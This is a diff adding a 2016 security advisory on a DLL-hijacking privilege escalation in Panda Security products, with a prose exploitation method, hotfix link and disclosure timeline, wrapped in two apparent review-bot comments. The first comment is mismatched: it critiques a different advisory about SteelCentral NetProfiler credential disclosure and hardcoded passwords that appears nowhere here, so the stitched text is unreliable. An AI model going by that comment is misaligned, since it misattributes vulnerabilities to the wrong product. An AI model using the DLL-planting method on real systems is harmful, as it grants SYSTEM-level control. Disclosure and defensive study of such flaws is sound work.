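Review bot: the Solution section is internally inconsistent: it says to upgrade to 10.9.0, then states that in that build the `/etc/shadow` contents are still disclosed in the hidden `originalsettingsid` parameter on `/index.php?page=security_compliance`; the credential-disclosure issue should therefore be listed as unfixed and the `Affected versions: SteelCentral NetProfiler <= 10.8.7` header extended for it. The hardcoded-credentials section (mazu, dhcp and root sharing a published password, with `mazu` holding passwordless sudo and remote SSH access) likewise says nothing about whether 10.9.0 forces a password change, which is the one fact an operator of a patched appliance needs. Minor: the PDF link appears both under the title and under Additional, and "sanization" / "applications web interface" need a spelling and apostrophe fix.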


@ -0,0 +1,78 @@
# Exploit Title: Panda Security Privilege Escalation
# Date: 27/6/2016
# Exploit Author: Security-Assessment.com
# Vendor Homepage: http://www.pandasecurity.com
# Version: Panda Global Protection 2016 (16.1.2),Panda Antivirus Pro 2016 (16.1.2),Panda Small Business Protection (16.1.2),Panda Internet Security 2016 (16.1.2)
# Tested on: Windows 10
Panda Security Privilege Escalation
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Panda Security - Privilege Escalation
Affected Software -
Panda Global Protection 2016 (16.1.2)
Panda Antivirus Pro 2016 (16.1.2)
Panda Small Business Protection (16.1.2)
Panda Internet Security 2016 (16.1.2)
Testing Environment - Windows 10
PDF: http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf
+-------------+
| Description |
+-------------+
Multiple Panda Security products are vulnerable to local privilege escalation. As the USERS group has write permissions over the folder where the PSEvents.exe process is located, it is possible to execute malicious code as Local System.
+--------------+
| Exploitation |
+--------------+
“PSEvents.exe” is scheduled to be executed every hour with SYSTEM Privileges. When executed, it tries to locate a number of DLLs in its local directory to be loaded. However, some of these DLLs dont exist.
The DACLs of the directory that contains the “PSEvents.exe” executable allow a user in the USERS group to create files in that directory. A malicious user can exploit this vulnerability by creating a malicious DLL file in that directory and name it as one of the missing DLLs. After one hour, the “PSEvents.exe” process will start and load our malicious DLL
The same method can be used to exploit other executables (PSDevice.exe and PSProfiler.exe) located in Pandas Downloads directory.
+----------+
| Solution |
+----------+
Install Pandas Hotfix for this vulnerability.
http://www.pandasecurity.com/uk/support/card?id=100053
+----------+
| Timeline |
+----------+
10/5/2016 - Exchange PGP
11/5/2016 - Advisory sent to Panda Security
14/5/2016 - Confirm receipt of the advisory
23/5/2016 - Email Panda Security for update
01/6/2016 - Panda Security reply that they have a fix in development.
16/6/2016 - Panda Security send hotfix to verify if it fixes the vulnerability.
21/6/2016 - Panda Security schedule to release the hotfix on 24/6/2016
24/6/2016 - Hotfix released
27/6/2016 - Advisory released
+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings, contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
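Review bot: neither Description nor Exploitation names the directory whose DACL grants the USERS group write access (only "the folder where the PSEvents.exe process is located" and "Pandas Downloads directory") or the scheduled task that runs PSEvents.exe hourly, so an administrator cannot confirm that the hotfix at http://www.pandasecurity.com/uk/support/card?id=100053 actually removed the write permission; add the path and the expected post-fix ACL. The same applies to PSDevice.exe and PSProfiler.exe, which are mentioned once without a location. Style: the `# Exploit Title` ... `# Tested on` header block repeats the Affected Software and Testing Environment block below it, and the "About Security-Assessment.com" section is marketing text that adds nothing to the database entry.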